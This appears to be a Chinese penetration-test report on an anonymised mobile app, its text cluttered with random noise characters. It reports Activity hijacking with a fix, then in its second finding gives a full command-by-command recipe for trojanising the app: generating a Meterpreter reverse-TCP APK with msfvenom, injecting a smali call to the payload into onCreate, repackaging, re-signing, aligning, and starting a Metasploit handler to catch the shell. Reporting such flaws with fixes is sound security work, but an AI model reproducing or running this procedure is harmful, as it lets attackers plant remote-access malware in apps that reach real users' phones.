6 u+ `% f4 u$ }$ ~, w6 H/ s ! x: z7 J- W; D. V4 B9 c; Y* {
- o! s1 S, s& N7 i4 t; j, j
5 i7 z' j O4 L7 n6 G7 u
. f5 G9 h/ \& J8 j& B9 ?7 c
# o- ^ M& m5 q/ O8 e% H) A$ z
- o3 ^6 l' `- E: ~+ J: P 2 检测结果
% r' w- b: [/ W0 f @9 E& R: s% t7 h
- {; K: b6 `7 L1 z; G4 P
" z( I& ]4 y" w& P
5 f/ E6 n% e( B+ k# c; G2 ]
/ E) h U, [* I; \. o 2.1 某某某
3 g( q. E% N+ i; `% l+ W' O
) t- q9 u: I4 Q! u4 K- O/ F
# x, Y7 Z& d0 _4 h% \' ^- V! X' G
3 J7 O' ~% ]. Y" [
" {, x3 G; f+ P2 z% `+ U
: r& W6 b( K* T6 S0 n x. | 2.1.1检测目标
# w5 d" U: v E& }9 J7 c3 P
, M' Y* W p4 F. p$ P# t- A$ b h
; W8 p( T3 q% q! b
# k( L1 S3 s% G. _+ ~& @: D4 G 2 o! a* a2 }9 r* U/ K
* H' G+ C+ h. V/ \ 目标地址: 某某某某某某APP
, v3 D, C" x5 ^+ S: i7 _, N+ h
( n8 U3 |0 H( Z- ~( d: N* n: d; M
/ T4 ~) j( J- y6 F% g; Z
2 D4 t2 V! L+ l: ^- J # Z' v' n3 B- P: i. T2 }
9 T, A, R8 Y6 F7 K 2.1.2检测结果 ( i; x. V6 R3 H$ ^5 ~- G
+ }3 t0 m8 ?& F, b. t
$ x# a, b/ {- S
1 j2 O+ X, k- s) X2 \" g8 r+ k
, Y2 \# c8 J9 K4 L! K: ]) T4 }
^- b5 n& [0 B% V* }" h4 _* V" N1 O# G 2.1.2.1
& c8 h! D, |3 F" [5 X+ ?0 y) W, q$ d C6 U# e
* T" g/ Z1 D1 B3 t9 w/ ]
7 V; K: y1 g( t. `. r * F g3 t" ~( x! [: M1 `" h
9 i2 k6 A/ R& O9 K0 W+ k 漏洞链接地址:某某某某某某APP / F5 B/ T; X8 t
3 {4 J0 Q3 ?; h) d) H- t* Z$ p
6 \( s, c+ z8 ]1 s) T
3 ?/ U& x7 \: R: c- h/ U* R
" T9 v& i& o" A$ R, R; ?1 g. T" }# t3 h: l2 `+ z
+ B, P. ^& |/ Y" @1 A/ r5 i, H! N8 {7 F" i1 z- }& K) o$ N
; a& h* Y. f K3 }% Q/ ?9 f' Q' [; m
8 t$ p' T: _4 U0 E + o4 W# n6 K: F l' r9 x
5 h" ]" N9 ?! ~5 ~5 q 漏洞分析及取证: 4 c% p, w q o. ^: M7 f* K
& ~& l8 I# Q" c7 `0 ^4 b5 u$ J4 _
0 d0 }9 O! x. m4 `) u1 r
0 l' w8 b: k! @0 g 2 @" Y4 U) ^0 g
3 r3 O' M1 @" @7 k5 T
通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: ( T- w1 R; \ a, x3 w
) P! j0 z0 c4 o( e
/ P9 i; D q* J8 ?6 f. T: U
: u% e# L. y- K1 i+ J3 R+ r% [
0 B) r: H; \5 V" b. I. A5 l: ]# j
$ I$ f9 k$ \% B' ~5 }* t2 ^
$ W; N1 f5 J9 {: J2 y
# p$ {+ J7 {- p( |- P, l
9 i/ |( o9 t9 E
) G- v3 ?, B2 c
, O2 n4 ]9 r1 s, g/ f1 g& E) B7 [7 m9 M) c' P/ K- r1 f( g" {: z
6 Y1 S R |8 x5 z* D4 P8 o: O/ L5 G. c9 \
4 O o: _0 I1 J- u6 h
3 p( M; }( Y% g# ^& r/ M+ |
7 j. h# X+ O& B# _7 K: W5 x% q" K: O: n3 d9 H: V
! s V& B7 m2 D5 m6 x6 Y0 k& e) }
$ L% x- M) ?8 b1 ^' W
4 t! `" [! S* P$ M& B1 L; \+ D! d
0 e# Z8 W L9 y8 o* l" W% c& d9 R3 M5 {) C
+ o* o% M, z: X
5 Z% b. G) F6 N" @2 ]" X- d
, R/ q3 E2 W! r8 b, E/ X8 q$ a: }
5 L1 G* ?6 {( j( \: {1 u3 d
) }6 Z* T/ k8 f/ I! |4 ^& M3 L7 f& h* d# q
' S( o4 {. h" ]& q, m
1 D% r% {, v* }- c: m4 t
4 j5 G- R4 G2 ]1 F: v6 F( l
, l- g& @. i* ?( A
9 o2 q& F# _! `4 C7 o- q
! T! ?3 u/ M0 r& \' @' q2 W 漏洞危害:高 0 `- m6 F8 D1 o- k
2 |/ x5 w& v, y9 {$ G( a: `3 y- V
6 Z/ {) t, ~. [0 U! U9 s4 ^% o9 \: c! p$ h$ u9 S. r) D9 Z9 c
8 N; ^* k' I9 A6 m$ V/ a
# ]7 m: O O; [: `, ?( P" a3 F( n0 k" m
- a0 i7 ~9 r' w: ]- x/ z3 X& |
- S3 N8 U" s0 b/ s7 c* R
* J+ p4 B8 C8 w
% p, z- l, B- e' O! s! J. u6 W" @
# t% j, z- c! L7 {* e9 I
; G$ j7 B3 b& C5 A, X
1 @, l8 ~* l6 e$ W# T. b2 a, V4 {8 U
9 n- g; u, ^6 L/ g C7 N . Y' e$ Y$ N9 X
+ [* Q" h9 t- L7 b 严重程度 + S3 d$ _& C3 G/ F/ U
% f [1 {4 v' H; ~( m 1 s/ ~9 x- p9 f
4 f4 b- t! ^, R" l$ i2 b7 J |
/ }1 ?2 m& ? s, `% X1 s% Q: ?$ i7 G* \6 o" W# c# M5 y6 ^
. P+ J, \ X% I5 L% b* m( M
U' l9 W+ S4 N; k9 B( _8 _' t+ G
]: ?# z, I3 [4 O% K7 b1 I
8 [9 v1 y; ^, Y3 u8 Y 高
) W- H2 S w9 ?, d7 O% F# {" o6 g
/ N( R" G; i4 n" d7 W. d5 _, o9 C k
|
) E1 B& e5 T5 C3 Y8 E: v5 \8 @7 R! \
( n3 M! g1 [$ P8 S. g2 E% E4 Z; {1 j/ S
- `' |) c, o* _) M
# R& L% t8 j9 h) g" s4 f. ^
■
5 V q0 R0 x5 L, s
# K5 `3 {+ C+ z# X- e$ V2 D+ _
) L r6 G L) B6 G2 f8 q) }
8 C \7 L( ~+ B" u' s |
& Y% E, I7 c7 ?8 p# j, R' R) q5 x; Z9 ~+ c
6 |" e- B5 b0 d
% V* U" Z# f, U, R/ D+ @- Y
0 j' i% \! G3 o! U( x# p! t p
: U% }% j1 R' M
中 d: N( w. c5 J, {! ^
2 i0 h2 u4 ?0 G1 h9 o
( P1 C/ S7 f1 j% R
( ~9 R' K1 t& G3 ]7 ~ |
+ x7 Q6 I& A K+ K3 X2 }1 w% M# C0 P0 s6 d% z
- D5 B0 s9 s+ x" i% B% a
( u' S7 Z- k% H6 f; p : k6 J) I+ r S# ?. k1 |& m' E/ Q
e9 r+ B8 X" l. J 8 E7 ], y! m5 S9 K# H
9 q6 ^$ S7 D. ^& Q
( t8 T, Q7 s3 U( I1 J8 \( N. l
n! a- u7 h/ w7 g' i3 M& e' u0 t
|
9 Q. ~. N f* Y0 A) e
8 C( z: Y, W3 ?7 N! E5 B r1 Z* U, D* |0 M
/ a, c9 d% ^3 z8 N; ]* ~6 u6 {- O5 _ ; M- }( S# y; g; f! V
! Z' m9 `" u/ p L0 ~3 f# D$ i9 Q1 |
低
$ y+ j9 z @$ h/ A+ c0 v) j4 Q1 {4 E7 M. k3 s( Q
0 G% B! R# R1 O9 r% f& |) g, L* |/ c: Z1 T. M+ T, k& `
| - v1 z+ e$ H8 |
! B `" X# A X8 S" B
2 m5 |/ e) w& B% X. s& Y+ f
) j. i J8 ^. n! _( f; ] G
* P' U2 _2 S- `2 ~" ]
J4 A$ g4 `% `0 W . K! Z! w. ~" m D! ]# M# W5 N2 x
' p" h1 S% b5 |% {8 K6 L( H
" V5 e9 f% s, N: t2 T. c& R
% F* D7 _8 L, X$ k: W- f# F _ | _4 v0 W4 _2 B) ~( e
- U* d( _; h, B! C( M* f$ q( o
, C" ~, U% j8 D
; K5 |3 T# `+ ]3 B4 l' J) t
! C7 k0 R/ g, s9 |0 x5 `4 d) R; c( {: v& D
8 `, n% d) {& w, x& s
& V6 `3 k" Y+ \0 u5 S6 k( |2 g 8 C+ u- ~2 w7 r0 P1 `1 A" B7 Z) s
- ]5 a2 z0 }" R5 k+ S' q
N* {5 f6 _( |3 z6 I2 M0 M, ?' b7 p6 |/ O0 N
' U2 Q# n5 q6 B
2 `) A+ T: Q0 H+ C' ^5 F
5 H* p, b5 \& x: G/ o. [- Y: E6 e: t) A" M3 q
! a3 ^3 j* J. j) A; [
4 S6 }7 C1 M$ ?5 n 修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 0 {0 O6 h# j' U+ k& Q* ^, J
; f; Z8 I7 F; j. T) S
2 B0 |7 d; v5 R& |
6 A! n, I' D$ \9 U5 G% E2 I. S4 C1 f ! ]7 @6 V, d5 j$ y
) a H4 w |4 z9 @5 O* H
8 K1 K: ]- x; n* ]# S( z
7 U* m( B7 j& y+ L7 z* p% M" `6 C
# i0 d) P- B/ Y5 T8 o3 {
( h" ?2 T. I$ H( f * F$ h& i& I! l# W* V( R: w* P! G* ?, o
: u v I, I' d* Q. C2 x ! t2 A7 [6 Z: ~, t; N, g! @' ]4 z
/ h, o. J$ o- z* b4 x# w7 t3 [
2 U" R% `/ m7 W N' {8 x* }% @1 y; ^# r7 m6 Z. V7 H
; \" m6 `" c& P8 V8 g
1 I$ a+ Q9 T7 A) O' a& |8 v 2.1.2.2
( B0 V( H% Q. K1 e
; t4 P$ ~3 ^# Q. n+ @) x5 W
0 \' M y( g' ?+ w9 s' J
3 P/ }4 M' a o# J. r$ f R& e& O
$ t* F" v B2 L: r! ?/ _ `. F5 A, G0 I2 H% j$ d3 T" I
漏洞链接地址:某某某某某某APP % E: [$ ^7 m6 j( s5 _* w
; w1 d3 _# B9 W3 \( l$ R- Y }4 x- s- T
0 f+ D3 r3 c5 a9 |8 O! R: z
! W# `4 Y. B; J& Q! \, C
, ]: L9 ]7 C% d- I1 D! V2 P; j( d
漏洞分析及取证: 1 H+ v1 s3 \ j; o* Y
, b( G: p$ o- ^" k' V1 L6 N
) D/ S) e5 C, S9 o* j6 H
7 o! X9 S. M% @$ [
+ ^9 U2 s& Z) T c
) P; P4 O6 g0 X) @! p7 R 通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下:
9 ^+ Y+ u! T( C6 q3 T
: J2 A$ ]" a2 C5 s0 y
# P$ h5 i7 ?! U
7 r& E0 S$ I* P. l$ K) l , M2 U/ `" ^! z8 w$ h6 I
- H4 F: P+ w" n
用Metasploit 生成木马 apk
- W/ ^! J3 ~' K
/ R2 h1 G+ |; r ?3 }
" Y8 p5 C$ ^0 s% N( K `! I
& o G, I" |! Z7 l: U1 P
0 _; c: r! t7 Z+ T# C$ h" F# a1 U
9 J% o y9 _' J; u8 F- f4 E msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 4 b% @' W" x9 @
+ f; j( Z0 d w/ U: v$ j$ S
, W& k K; N; x$ @# B! i" G
4 s" f; d* ~9 x, l3 v/ g 7 V) {! l7 r$ @3 N, V/ Q
( |! t& q& E3 b. l" e. E
反编译目标apk和木马apk
- J7 \1 T r3 {/ p3 }3 o6 K! x- F6 N
/ @9 I" ^1 E, R8 Q$ t
& l, ^7 U. n3 y; b
3 h8 H! G8 z8 D! X. f9 Z$ {) w) |, a5 T. k" q
apktool d target.apk
& C) Z; Q! S" U# N4 {
6 Q w5 G" N; q' D3 Q, H- y apktool d cockhorse.apk
; H% ]' p# l0 Q0 c/ D8 ?: H' \* Z4 ]# B2 A0 b/ w5 t
, ]# w$ w: q' Q# H6 V9 h v. z( k* U# x
# \9 q; m% V/ m9 _, K" }1 D
: `1 ?7 Z$ E, w( F" ?! w
木马 apk 注入目标 apk
6 |# z" m2 V3 A' V* I0 S/ W8 Z9 ^& E$ w& x: C, l
# l8 f" O0 M0 ] p! E2 T
. N; X8 f) l& ~+ s3 D
; @' q4 F/ T% \6 E9 M
$ R' A. q" c: f# W& R 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
/ b# F. f8 s$ }. M+ o% f+ A8 l0 `% |4 ]2 }! _
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V $ a6 n* q1 N( P$ K: K H- _2 R
: d$ i* t6 U a2 y3 b% z2 t
* d6 E% N% O* h
0 C! z+ q0 A2 s9 ?% ?/ G! s1 P 5 {. @) D1 Z% i: r
5 M5 I* j5 D7 q9 Q5 G& s0 d1 M 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 " |8 C7 }$ s8 B. K: P' U$ O
: k0 w0 G) Z0 h+ ^8 Q9 n0 z4 Y) N
3 Y9 @7 c7 s3 {3 _% E& S9 k3 B
: w9 u1 `$ }9 J- j. b : C9 t( u4 a! R/ z
- K; X2 E; _* d0 _- D5 |" J
将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下
6 }; @* S' c8 W
) _% v& x3 D& U8 T7 ]& M, V
5 |" a, h1 k* r& m" o, J
: o; _% q9 O5 |: V6 G
" Y4 R, C3 ^3 y* |/ n( @+ `. _
3 x1 V! x( ^5 p# F9 r/ N& V 回编译生成最终 apk 6 y5 i. F; Z$ Y9 b/ N
8 o6 w5 \* ]% G* G3 Q: ]2 X5 h
3 ]' s, L& z9 w m- g8 A
! b0 p6 d. f# x % O7 ?' _+ ~, c2 p. u0 H( Q q
% W) d, q3 v6 Q* A' i 重新打包 5 V m$ \5 v7 H5 X
! p4 W G5 R7 `/ O) u
1 Q8 m* f3 \) f1 i7 L b& T% K( o
: N# l, o8 k* { {6 _1 W 3 P$ o0 C: T5 a9 |
& z9 Z( @. S3 l- j3 S- L6 s
apktool b -o repackage.apk target_app_floder
; n2 |, R' {+ b/ l4 Z! c4 A+ _8 K2 _6 A& p1 t6 F% k' T* f, Q' V
% Y" H- @" j# U. E, z1 X/ ]- {4 X/ [( l/ [
3 `7 ~; w9 T2 \3 F
% n2 B5 ^ L1 u3 s* c 创建签名文件,有的话可忽略此步骤 5 ?5 z/ G) G2 p- L* I6 h$ ~3 t. J: w1 J
, V$ k5 g9 f) q, T2 h
9 j* `1 i5 B9 b; L4 L% l4 C
: L8 q6 Q5 g( y! @+ g# g' C
9 E% F6 F8 F) O- T$ s! v
( O$ J [9 b. _4 L keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000
* c7 e9 S$ M* w) r" d3 {* c& B1 b1 @, P$ v" M4 {3 a
1 i5 Y# \3 }6 @1 r: ]
/ y" f9 \1 } C; M, x
) s6 {. m% s6 C, N/ v& A
4 i- ^4 Z1 [! \ 签名,以下任选其一 ; z9 l B, _( q
, P/ _& k' v F6 ^3 J5 H% d
5 t( a, u" e4 r1 V- i- }: l' u6 S
3 m, \8 q0 S. h9 L/ p0 k1 a% Z
* D8 f5 g3 g5 }. [) N. T$ W9 {2 [3 x6 G
jarsigner 方式
" B: c. G: z- k0 k" k2 R2 ?' ?! k3 B4 s* M- N: V% N h0 d
7 M7 m, k# u- @0 z% w1 d" t
! N8 h( F- U3 L- I5 l4 d 2 m: y l, }* U5 s8 H: P" v$ I
8 \/ F! h- _8 o$ t/ M% I
jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname : v( j" f0 p2 ~/ Y9 g
+ R+ d5 ]2 h* w4 w
0 `8 F% h8 A0 B/ _/ G2 ]$ x; y' M! V6 {, S' v B
# a, I/ U0 `8 a5 w9 O8 ?: E v$ n4 y! ?) O$ K
apksigner 方式 ' U2 f& M9 ` I: V- X: K9 h
" F8 M6 f) l0 y8 g
& ]& E9 Y5 h* j( E/ V2 l$ r
; {/ n' F9 W" c9 p- o
2 U2 p, r* E" o: o# }7 j7 ^! X* K2 ]7 ?, y/ B: v
apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk
3 y& |& g( o' k. j- F# ?* b5 Q/ E; d) d0 T; c' y) Z' S) m$ {
) d7 Z5 e- X- }' i: K& h
- w) R1 H/ ]$ y1 E/ ]) x
6 u1 K' @1 P* d
7 ]; g) e/ _9 z" U2 F* w
如需要禁用 v2签名 添加选项--v2-signing-enabled false
+ l: L$ H* \) w% O: G% E& z: E! Q: f/ p( U: F) ~; [
6 h( e+ N0 J9 Y
) A, B, L% w0 k+ F0 M# O* O . c% \2 v0 w1 N4 e: z
& L0 B! Q6 X4 K4 S
验证,以下任选其一
' x$ G, v% a' A) x2 s e
( K% B. k& d/ W
7 _) \ s8 C% f ^
5 F# L; A2 ?5 w# `
) q- ~: j- s, n8 B
( c6 g3 {1 Z2 S" j
jarsigner方式 ) v& W/ o: X$ m
- q& z4 u! H( O* Y" L7 g
) d' S/ d4 f3 U
) L+ y- Z3 T$ N
% t- Y: W+ l5 S3 m
4 D8 p0 O) |! g8 M& i' u jarsigner -verify repackaged.apk : b! t# x* L/ p8 E. g
. [& o* a" D: X! f2 S
7 x% S: F$ T L. z
. x% U/ M; }! t ; m+ N) e) S b3 X Q- K2 S
, x) d3 ]+ O- g& o0 \4 l
apksigner 方式
a" Y# K# o7 ]2 s6 W! G5 D8 {0 G9 w2 O5 h- s- m/ d
& E, M' s% ]6 l) {: ^8 b( y# H# s
& A/ Y Y6 @0 T. a3 x- v( q
, [& S1 @2 N. W1 z; s! s" Z3 R
' Y; n; G3 M% c. L% C* X
apksigner verify -v --print-certs repackaged.apk 0 j! a. ^, G" p4 s0 F7 ~, `
9 J# A2 h5 {( k+ p2 X. q0 Z
. s# ?. E/ }$ q% q, }; t/ |/ E
& l$ @; o R v5 \ ~" q
! \6 \7 G+ r% T6 h- w+ o2 g
, ~& L2 o4 g/ J0 a5 ? keytool方式 & _% i0 }- ` Z4 r' T% t: W9 {
- ^7 t# |" {3 s; W6 q7 S: c
' d( y! _+ Y" g
/ l' A) k) M& V! A + x6 ?- N6 a6 U# q( E* C8 o
5 V2 c; S# A: O2 X5 I8 {1 \' P keytool -printcert -jarfile repackaged.apk 3 _; r2 \5 B; ?. T, o
w0 \: o2 Z) Q# i6 c l G( M/ e! w
' _% d5 n% J! _4 U6 M: o2 a# l3 A3 w: r3 Z+ G5 T) j4 _
F0 X2 k) T+ w& m/ F# ]9 I3 ]; @5 s6 I5 u9 w0 i+ q9 W3 T6 D! v8 g6 u* w
对齐 + q* @2 _4 n' S* T- ~! E* |' N
) m+ s% ~) @; w. m8 ?
" w) }# }1 P+ ?7 e# r. e6 W4 z; F- f/ c& O$ N) O2 ], m
$ M. D9 G8 G# C: T. z1 u: q( m8 \5 Y* Y- F1 k& _5 n: p
字节对齐优化
3 C9 i. R" K9 Q6 z( Q7 z
7 z* A# c0 Q4 Z
) K: Y* X; b! Z- \3 K, L8 I% C. h* h# l2 b
% g; ~. L5 J. y9 a6 ^# n# p5 q9 O3 Z' [% |& }6 E
zipalign -v 4 repackaged.apk final.apk
" \8 H0 w, R4 X+ S8 W1 Y8 x/ s f+ Y
2 s! J J* q" x& V! m1 b' H5 C3 K. s* W) |+ w- T. k5 e
& Q U0 @( Y1 C; z. }+ W' i2 w
+ S; Z0 f) }; [' H" p4 |
检查是否对齐
& d! Y5 `3 I, J) U4 t6 `" _) L. v$ u
" q% N# @5 M/ \5 {
* \% I4 r C& O; T: o0 Q
% A8 v! j# [+ S) D& g4 }. ]
1 ]3 j8 N( ]. T# w
zipalign -c -v 4 final.apk
; v! L w9 s; o( H' W1 t+ c1 [7 ] x( @
( {) g* a# V+ l) T, u3 Z; I6 O$ A1 u, h* _2 P- U
6 z% F ~2 z3 C( Y) L9 l3 q
1 `" {2 \( Y% ]4 }) v 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行
& [4 E$ J' h5 e+ }
0 s! Q1 t! ?( j$ A# S% `7 N) W
" [2 B4 b7 N& c' j" R% a& Z) |, G" M. z5 G, X, ~
5 Z: d* S3 K! J$ z& f
* E$ c2 d _. V3 l 启动Metasploit控制台,配置参数等待上线
) f0 u2 @2 c( m6 }( p
/ @5 |% z5 b Q; n5 f
# E% N1 _% q: B9 x9 H; u
" e$ O0 ?" p j5 ?2 R5 Z
( U# y! J. M; Y; p X- k5 Y' `: I, R% i9 d# O) w3 c
在终端依次输入如下命令
* p) X/ k6 \2 C# s
# a' o2 c- |: k
c4 W1 q4 R. _0 l2 u! B- I
- O( B1 |# q( _! _/ p) G
3 H/ h5 D& ^" Z r# M
2 r0 d( s8 \7 R0 h+ b
msfconsole
& K5 e4 L x* W: h1 U+ z, m6 g1 k! o+ \! ^! x
+ H6 {$ U" R1 W4 C& P" t
( n& W( f9 U1 ]: [) V
! s0 r) R: q3 z
) e7 Q) U% c9 b2 R* c
use exploit/multi/handler
& k' w+ p/ ^) i" F* v! I1 ^+ {1 X+ {' b+ j8 B$ g) f* r
" C# C( f( C) e0 a* o5 k u
& O9 J! Y7 c* i) e
# R9 h, ^% f! i4 W) K. A5 o* G
0 Z$ m5 ~$ Y9 ]4 }/ F; x% c set PAYLOAD android/meterpreter/reverse_tcp
A! d7 U- k" ^ C- n% c! K
! z! T! ^: s' H
' Y! d g( L! [% X" K
. L7 T& @7 f2 q- J. c9 q E1 |4 ^/ m l: z4 d- r
4 B7 [: O- L, F4 w% f4 u) w
set LHOST 192.xxx.xx.xx
& y% n) S2 k' Z; _, V2 e4 p& ]4 |3 M8 r8 R
/ I, p* J. Y H; g8 B# k
$ X1 ~3 g0 Q. I% w + S& h0 M" B" d; x# l, ~$ C
- N) h- Y% R; t( r @, L; z4 x0 r, q
set LPORT 4444
) z; A8 L2 A2 ^$ k0 Y" H5 I
* n/ g0 n2 X$ o
3 I y% M: e; x& Z3 a! n# d
6 x0 N5 P* ?9 @3 Z) H, Y7 d. P5 t
! n3 s0 h% I |: W% N' S# {
8 L: ~8 y% u. E6 v; b# W1 m% {2 m exploit ! C( O7 Y% N" }3 j
+ g2 W' a: z: B
9 u" |0 j% G- o$ b1 P( v& a
, _7 ?( l3 m2 o. [1 |! w
4 i( e. J/ B- G% W- E: s
5 Y1 O$ n3 d& |- d# J
之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:
$ S4 M& [$ P0 S) o p G- m s" ^5 ?
1 B$ b# i/ w' _+ i+ c
4 M/ u/ S" ]0 I6 r- u; l
9 m+ T: s t. m, d& r# O
- R3 t0 I Q9 V, B3 t0 a+ }: O
/ m' ^3 {: U' ^8 i7 ^ 漏洞危害:中
0 g1 Z @' u, k$ G7 F8 D, |# X% E0 m0 a
8 [# W9 x3 F+ ?: a: a* F' U' X0 x) |6 r- B; w$ \8 z2 ~$ ~8 g
' z+ [. P9 \) A" F( j2 l1 o& B4 x9 e: x2 ]0 w' `: N/ S# H
6 X! b% F' J& I
+ G) \2 V) \! T: o' T. u3 Y5 x5 H
) f8 B6 e: Q9 o3 ^; j' i/ u
& D0 D$ m% e4 f6 _ $ G' O9 M+ T2 S+ z6 S' V
: A- x1 M5 b2 W- N5 w 8 _9 u+ F3 J: ]1 ?( j+ V7 o9 B( M& ~
4 s0 G2 F9 Y Y5 y. ?) t/ h# Q) n $ H' T" W( Q$ i7 Z% C
: E6 n6 T. ]$ a4 o# q+ g
P' k: M% @8 X' r
0 k+ w2 T9 X, _ 严重程度 ; b- h0 |3 s3 \! F
J; k& J( [3 S: ~/ D; w+ ^1 y8 o
+ ]2 y; B, B# m5 W1 `& b" R( U
, F5 B$ b* |8 j5 m a | ! z7 G) M3 m' y, a
- y& y8 ?5 \# P3 H. M* ^; _3 t 4 a2 g! ^9 o% F4 C: m6 r
2 {" ^/ x8 F# M6 L6 z ) K) c& A1 J4 e. ` r
8 H3 Y* ]4 G3 ` I9 V4 Y 高 " e' Q# E$ v1 j4 t! x6 C9 t/ N
! [% `: f0 J$ j7 ~5 o0 Z& @
; G; O5 h; |5 |3 o# ^
0 n0 A% I! b8 O9 g+ O2 e5 n5 w | 3 X. e$ U1 B& E$ J6 f. @, ]6 w
" ~! @5 R2 z3 `0 X
9 r: v1 ~ V9 \$ s& G" t
* G% T _- M$ f( l& {
( Z/ _: m& ~' N: }- Y# @4 P1 ]7 e7 \: @, @1 v
■
6 V7 ?' b1 H5 m% F
, ]5 e* Z+ j9 x+ }1 g4 H& h* T 2 I8 S6 | S* J9 \8 h
. g4 ~8 o: j/ H, D
|
6 N) Q# R8 R) m) ^2 q) f8 w: @5 A! y( o3 {0 h/ g
9 D3 T' U4 M2 h+ L, h8 t! o% V' M. g! v( ?; t6 K( v% _
% v8 a2 @, C5 I/ i$ E" R
' i; r: @; x& Y 中 # Z& v {" E9 f
0 z4 Y, H! P" A
1 h3 s) H5 _/ s8 ]" R& L9 H* ]1 j& |0 G Q
|
0 V: y7 F: @# W2 h6 k/ y
% \' a; _7 o6 O3 l ' V' [2 A- w, {7 R
' }( `& T4 u( y- ^0 n, l
- o, }* @$ z; {# w" {
5 K5 \0 r5 z6 z, o# _4 j% ]
" Y( P8 ^" K. C* c2 R
- Y/ G0 V2 ^* b) C$ Q
6 ^; y& m$ @2 I2 u6 {' }3 [
* ?- d) Z3 j+ l. n
% W+ \* D# @% P5 H: q
+ {6 q( Q b/ Y$ ~ | 7 }. [* E; c2 }, {/ A+ Z8 {' \/ N
+ l8 ^1 L. }8 y
% H3 I. @& O/ e- r+ g' }6 a* K1 ]5 f! h- ~, e9 _' H9 t* e
4 S9 `: O* L7 d* P) r# l" Y
$ B4 t5 h* D7 a! ^. ~$ c. G 低 , m! ~+ i$ N) n, U
& t) `) ~% d0 o- K q5 V. D 1 t5 L% H3 [4 J1 n" _$ C
( A: R, ~" U( s/ H, d: {
|
0 e) ~# N1 J8 n5 |3 e+ \( |4 k
6 [4 E( A' t s# V% O* e , d$ G& u" w9 [' K' O. w Z
( l- N& T$ t/ m6 s; X: \ % f: j# T5 w; m3 c, v7 `
# |' @( V, Z- q" M1 X: n4 v; f/ x
" ^7 [4 z6 e+ Q7 h- o" f
$ q4 o) ]0 d9 r8 @! t6 ~
+ m+ R9 N, b9 C X+ q! u! g3 P+ A
( q. c5 f# \3 d( h. F D; \
2 `$ r) i- [2 I- Z+ Q$ Y
0 A9 L5 H p2 ]* H: U& X; u& s |
8 K- L9 K9 W8 z7 {$ ^9 r
# o) P/ U# v+ l
3 T) Q0 \3 v {, A& Q% ^
; L" c# W' m6 {* W- q' s, y
) Q9 I5 x9 p' C) m, r
; g+ O* \8 i0 `3 G
3 }) V8 @$ K- H5 p3 ?9 D" L9 Q5 @2 o9 C4 p1 ]
3 `5 {4 D3 p6 Y: I$ p- z4 r/ e1 N6 O) r2 l, Q
' x1 `4 C8 L2 E/ \3 g/ ~8 O
& H) s+ o7 X" _& @# `" |
* E6 X/ N3 J. I- T' ]+ W. M7 x8 N
4 E8 ]" T) J8 u9 j2 ^
1 U3 O4 n% E' ~6 S5 p% O
6 J( `$ }0 K$ P( w5 w 6 F9 _8 I! n+ N# \
* m* g# m k7 v% l5 q% x 修复方法:
8 |) X4 ?" v; h- S- g( T
3 @4 @$ U" {: i
! D: T4 |3 H# j$ ?* }( z* U0 U6 e
2 w9 z* V8 R- ]8 F) O6 k/ U
9 Y2 }+ ?2 ]- c# N" K# F% u" p
) H! g1 A# g: C3 P' x' O8 D 1.在 APP 启动时应做签名校验防止二次打包。
+ M; p$ v+ } s5 f
# p8 Y0 j, e& O: x! Y. O% m% S8 ^' R 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 5 Z0 s) G2 I: V6 M3 I J( ]+ d/ D
|5 D9 g0 o( m! [8 q
d3 P" L4 ^+ j, u1 n: b+ o2 l
5 U$ I9 L. o8 O! t R& f
: k6 h6 L" c5 B3 ^1 ^
/ \9 {, w" J2 S# Q) l* c, @2 l 8 d1 A( Y( R m0 ~. K4 Q
# V8 f3 g; J1 I! D 8 t: D& n$ g x$ r1 {
5 n$ ^4 J# e7 i1 z7 w8 z
$ Q# j! f* k6 c
* n2 P4 _! x* X% O! [
6 G0 K* T/ a# n" N
( D2 B) |" e# m% f' x+ W: s , c: g2 D; \7 B: ~# |
9 ^5 u- w* T1 {( J- o
5 N3 r2 }; w4 @5 B+ ^; Y" J* E
" u" i3 T4 M. Y# N- d
" ]$ Z4 `2 N' s& y. ~5 d0 U. [$ Q% V& {4 B M